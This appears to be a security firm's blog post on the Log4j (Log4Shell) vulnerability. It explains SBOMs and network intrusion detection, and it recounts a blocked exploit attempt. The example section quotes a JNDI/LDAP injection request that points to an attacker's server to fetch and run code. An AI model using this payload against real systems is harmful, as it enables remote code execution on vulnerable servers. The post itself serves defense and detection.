Software is man-made. And everything man-made contains flaws. Because of the complexity of most software, not all of these flaws are known. In many cases, these flaws are discovered by the creators of the software and are addressed by them as well. In some cases, this flaw is detected by people with malicious intentions, we call those cases “zero-day vulnerabilities” or a vulnerability known to “hackers” before it is known to the creator of the software.
Whenever such a new flaw is discovered, you, as an organization tend to pay more attention to it. “Hackers” (or threat actors) also pay more attention to these, and will designate more resources to randomly exploit these in hopes of earning money or reputation.
Log4j
A very fine example is the newly discovered zero-day vulnerability in the log4j module. Log4j is a Java-based logging utility and is widely used in many applications, self-hosted and managed services alike. Services such as Cloudflare, iCloud, Twitter, Steam and even Minecraft: Java edition are affected. In essence: all Java-based web application may be affected!
Are you affected?
Most organizations quickly want to find out if they are affected or not. This can be discovered fairly easily if you have a software bill-of-materials (SBOM) ready. If you do not, prepare for some manual investigation and think about creating such an SBOM in the near future. Either way, you’ll probably investigate whether you are impacted or not, and will either patch or implement a workaround where possible.
Network intrusion detection
That’s one part of the issue dealt with. But what if you were vulnerable? What happened during the time you were investigating? Given the increased attention of threat actors, they might have already exploited one of your systems. This is where a network intrusion detection system (NIDS) could play a vital role.
A network intrusion detection system continuously monitors your network, or at least the parts you let it monitor, for intrusion, It looks for strange behavior based off of known attack patterns (ways hackers tend to attack), signatures (unique software identifiers) or even AI-based techniques. Whenever it does detect unusual or suspicious behavior, it can alert you so you know what’s going on in your network.
A practical example
This might sound a bit abstract so here’s an example:
With the new log4j vulnerability CVE-2021-44228, many exploit attempts are going around the internet. One of those attacks reached us at Spinae. We do not have any publicly accessible software running vulnerable to this log4j vulnerability, but we detected an attack nonetheless.
What happened was the following:
1. The attacker sent a malicious request to our perimeter firewall.
GET /$%7Bjndi:ldap://x.x.x.x:x/Exploit%7D HTTP/1.1
2. Our perimeter firewall logged this request and forwarded it to a central logging server.
After inspecting the logs, we saw they tried to insert a sort of substitution into our logs using a fairly simple request, which would be opened by log4j and would then download the exploit onto our server, if they were vulnerable at least.
# The code ultimately executed on our webserver
open() "/usr/local/www/${jndi:ldap:/x.x.x.x:x/Exploit}"
3. As it traversed our network, the NIDS was able to intercept the traffic and detect the attempted exploit based on the contents of the request.
4. Our NIDS sent an alert to one of our Slack channels and notified us of an attempted attack, giving us the incentive to investigate it’s attack path.
The detection and notification of this attack on one hand allowed us to know we were indeed attacked, and on the other hand allow us to respond to the attack as quickly as possible.
Conclusion
Threat actors (hackers) do not need a lot of time to exploit newly-found vulnerabilities. Even worse, they tend to abuse the confusion for their own personal gain!
Increased visibility in and knowledge of your own network is crucial to detect if you have been attacked or not and assists in the incident response process when you do get an incident.
Do you need help to increase network visibility, or assistance in assessing vulnerabilities in your systems? Feel free to reach out to us, we’ll gladly help.